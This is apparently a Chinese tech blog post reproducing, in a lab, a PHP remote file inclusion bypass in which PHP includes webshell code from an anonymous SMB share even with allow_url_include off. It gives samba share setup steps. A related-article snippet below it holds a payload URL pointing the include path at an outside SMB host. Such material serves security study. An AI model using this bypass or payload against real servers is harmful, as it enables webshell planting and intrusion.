fopen打开ftp文件_PHP RFI allow_url_include 远程文件包含漏洞

最新推荐文章于 2024-04-18 05:50:26 发布
最新推荐文章于 2024-04-18 05:50:26 发布
阅读量387 收藏
点赞数
文章标签: fopen打开ftp文件 ubuntu include包含路径在哪里写 查看smb文件浏览记录

一、漏洞概述

php默认配置中”allow_url_include”默认设置为关闭,使PHP无法加载远程http(s)或FTP  url,防止文件包含攻击。即使” allow_url_include”和” allow_url_fopen”都Off也不会阻止SMB URL的加载。

当有漏洞的PHP程序,试图从攻击者的SMB共享中加载文件时,如果SMB共享允许访问该文件。攻击者需要将SMB服务器配置为允许匿名浏览访问。所以当受攻击程序从SMB共享中加载访问文件时,SMB服务器将不会要求凭据,并且受攻击程序会成功包含文件中的WEB SHELL PHP代码。

二、漏洞复现

1.复现环境

  • Ubuntu

  • Windows

  • PHP 5.4.5

2.漏洞触发场景

当PHP中“allow_url_fopen”和“allow_url_include”都配置为Off时,会解析SMB服务器中的文件。

3.漏洞复现

第一步    

模拟场景,修改PHP的配置文件,将allow_url_fopen”和“allow_url_include”设置为Off。效果如图:

9bca460c92d3181f121bf6899aa93b4e.png

测试下函数配置是否生效,结果如图所示:

18e680900920c98aa7765ca613695f33.png

第二步    

在ubuntu上安装samba服务器和相关配置

sudo apt-get install daemonsudo apt-get install samba

修改samba的配置文件

vim /etc/samba/smb.conf

在[golbal]标签下添加一行:

security=user

再 在文件末尾添加共享标签配置

[share]path= /home/share                    browseable=yesread only=yesguest ok =yes

保存并退出

更改共享目录权限

sudo chmod 757 /home

重启服务

service smbd restartservice nmbd restart

查看下共享

778bef8aac310cc365dd1b1edbf48854.png

第三步

环境搭建完毕,测试一下

a4cd18d35a438efa7e742d3b9a490af6.png

经测试,PHP在allow_url_fopenallow_url_include设置为Off的情况下,不允许包含HTTP和FTP协议文件但是可以从远程SMB服务器包含文件。

weixin_39609887
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP:使用远程文件
希望我的博客,能帮上你解决学习中工作中所遇到的问题
10-09 380
PHP:使用远程文件
PHP使用fopen与file_get_contents读取文件实例分享
10-22
主要介绍了PHP使用fopen与file_get_contents读取文件实例分享的相关资料,需要的朋友可以参考下
php文件包含漏洞allow_url_include=Off)的绕过方法
weixin_30323961的博客
05-31 2864
分享几个当allow_url_include = Off时的文件包含漏洞的绕过方法。 假设服务端的php代码(aaa.php)如下图所示: 第1种:smb协议 Payload:http://127.0.0.1/aaa.php?path=\\43.5*.**.74\ica\abc1238.htm 这种方法只适用于Windows类型的网站服务器,不能用于Linux服务器。 首先在...
PHP 行事准则:allow_url_fopenallow_url_include_allow_url_fopen为on
最新发布
mm627mm的博客
04-18 1108
allow_url_include` 是 PHP 的一个配置指令,与 `allow_url_fopen` 类似,但 `allow_url_include` 配置专门针对 PHP 的 `include`、`include_once`、 `require` 及 `require_once` 语句。具体而言,当 `allow_url_include` 与 `allow_url_fopen` 两个配置项均被开启时,`allow_url_include` 才能够发挥作用。
fopen打开ftp文件_Web渗透测试(文件包含)
weixin_39614546的博客
10-27 150
文件包含程序开发⼈员通常会把可重复使⽤函数或语句到单个⽂件中,在使⽤某个功能的时候,直接调⽤此⽂件,⽆需再次编,这种调⽤⽂件的过程通常称为包含。程序开发⼈员都希望代码更加灵活,所以会把被包含的⽂件的路径设置为变量,来进⾏动态调⽤,但正是由于这种灵活性,如果被包含⽂件的路径客户端可控,造成⽂件包含漏洞。⼏乎所有的脚本都会提供⽂件包含的功能,⽂件包含漏洞PHP 的Web 应⽤中居多,在JSP/A...
fopen打开ftp文件_第三十三章c语言对文件的自由存取
weixin_39629631的博客
11-29 134
上一章我们简单了解了fopen文件打开,但是在fopen里我们看到想对文件进行操作其实很死板,要么从头开始要么就是在尾部追加,那么在C语言中有没有对文件的自由一点的操作呢,其实是有的,这一章我们就来了解两个函数,fseek和ftell我们先来看一下fseek函数的原型:int fseek (FILE *__stream, long int __off, int __whence);我们看fsee...
PHPinclude或require引入远程文件
NEFU_kadia的博客
02-27 688
仅限于引用自己的服务器上的其他站点的文件 在服务器搜索php.ini Ctrl+F搜索allow_url找到这两个文件改为On allow_url_fopen = On allow_url_include = On 重启阿帕奇/nginx
php allow_url_include的应用和解释
12-17
通常,用户要求在他们使用其他的文件系统函数的时候,php允许禁止URL包含和请求声明支持。 因为这个原因,计划在PHP6中提供allow_url_include。在这些讨论之后,这些特性在php5.2.0 中被backported。现在大多数的...
php读取本地文件常用函数(fopen与file_get_contents)
12-19
下面我们以.txt文件为实例来介绍php读取本地文件的函数,读取文件我们可以利用fopen或file_get_contents来读取,file_get_contents更简单而fopen需要fread配合才可以显示读出的内容。1.首先来介绍一下fopen(&#41...
fopen打开ftp文件_笔试题--关于文件操作的区别
weixin_39835991的博客
11-30 144
笔试简答题11.缓冲文件系统和非缓冲文件系统的区别在程序中,对于文件的读,程序运行时间主要消耗在I/O上。与读硬盘上的文件慢很多;每次读取文件的内容很少,那么程序运行时间主要消耗在I/O上。文件缓冲系统:磁盘缓冲池(0.5k)二进制流(变量描述符集合)解释:系统会自动的给每一个正在使用的文件开辟一块缓存区,缓存区的大小一般由各个C的版本规定,一般为512BYTE(0.5K)大小。从磁盘向...
php include 远程文件路径,php远程文件包含漏洞(一)
weixin_31894867的博客
03-10 846
(服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可以去包含一个恶意文件,而我们可以构造这个恶意文件来达到邪恶的目的。涉及到的危险函数:include(),require()和include_once(),require_once()Include:包含并运行指定文件,当包含外部文件发生错误时,系统给出警告,但整个php文件继续执行。Require:跟incl...
php文件包含
m0_64361111的博客
02-28 1383
概念 把可重复使用的函数入到单个文件中,在使用该函数时,直接调用此文件,无需再次编函数。这一调用文件的过程被称为包含。 原理 文件包含漏洞产生的原因是在通过PHP函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件几乎所有的脚本语言都会提供文件包含的功能,但文件包含漏洞PHP WebApplication中居多,而在JSP、ASP、ASP.NET程序中却非常少,这是有些语言设计的弊端。在PHP中经常出现文件包含漏洞,但并不意味着其他语言不存在。泄露甚
PHP学习手册六:include 对本地和远程文件包含
xxs18326183038的博客
03-15 623
包含本地文件 test.php内容如下: <?php $name="张三"; $sex="男"; ?> index.php内容如下: <?php include "test.php"; echo $name,$sex; ?> 访问index.php 会输出:张三男。 包含本地文件时,包含文件(index.php) 可以在include执行后直接使用被...
fopen打开ftp文件_使用SMB绕过PHP远程文件包含限制
weixin_39665787的博客
11-27 183
简介在这篇文章中,我分享一下PHP程序中的远程文件包含漏洞,它经常会在文件包含中被利用。尽管PHP环境已经配置了禁止从远程的HTTP/FTP URL包含文件,但我将分享如何绕过远程文件包含的限制。PHP and SMB 共享文件访问权限在PHP配置文件中,默认将allow_url_include设置为Off,来限制PHP去加载远程的HTTP/FTP文件,这也有效的防御了远程文件包含攻击。尽管PHP...
PHP文件包含漏洞攻防实战
weixin_30687811的博客
11-04 1575
摘要 PHP是一种非常流行的Web开发语言,互联网上的许多Web应用都是利用PHP开发的。而在利用PHP开发的Web应用中,PHP文件包含漏洞是一种常见的漏洞。利用PHP文件包含漏洞入侵网站也是主流的一种攻击手段。本文对PHP文件包含漏洞的形成、利用技巧及防范进行了详细的分析,并通过一个真实案例演示了如何利用PHP文件包含漏洞对目标网站进行渗透测试,最终成功获取到网站的WebShell。 1....
linux 开启allow_url_fopen,如何开启allow_url_fopen函数
weixin_39542093的博客
05-26 911
有些程序比如dede和discuz,都会有需要打开这个函数,不打开这个函数的甚至无法安装!如何解决这个问题呢?这里给出打开这个函数的终极解决办法:1.首先确保你拥有服务器的操作权限,如果只是虚拟空间客户,那么你就联系主机商帮助操作吧;2.打开PHP的配置文件php.ini,如果你的主机是win2003该文件在C:\WINDOWS目录下,直接用记事本打开就可以,如果是apache那么就是在你的php...
PHP 行事准则:allow_url_fopenallow_url_include
两个月亮
10-06 2341
在开启 allow_url_include 配置项后,PHP 仅能够对远程文件进行读文件操作。在开启 allow_url_fopen 配置项后,PHP 将能够通过 include 等函数 将远程文件包含至当前文件并将其作为 PHP 代码进行执行。allow_url_include 的生效依赖于 allow_url_fopen 配置项的开启。自 PHP5.2 版本开始,allow_url_include 配置项的默认配置均为 Off,而 allow_url_fopen 配置项的默认配置始终为 On。
allow_url_includeallow_url_fopen 详解
qq_29566629的博客
08-04 8311
今天学习文件包含漏洞的时候,在php.ini配置文件就会接触到allow_url_includeallow_url_fopen这两个设置,非常有必要了解一下。 allow_url_fopen = On 是否允许将URL(如http://或ftp://)作为文件处理。 allow_url_include = Off 是否允许include/require打开URL(如http://或ftp://)作为文件处理。 注意: 从PHP5.2开始allow_url_include就默认为Off了,而allow_ur
allow_url_fopen = on allow_url_include = on
03-16
这是两个PHP配置选项,用于允许在PHP脚本中使用URL打开包含文件。如果将它们设置为“on”,则可以在脚本中使用像“include 'http://example.com/file.php';”这样的语句。但是,这也会增加安全风险,因为它允许...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值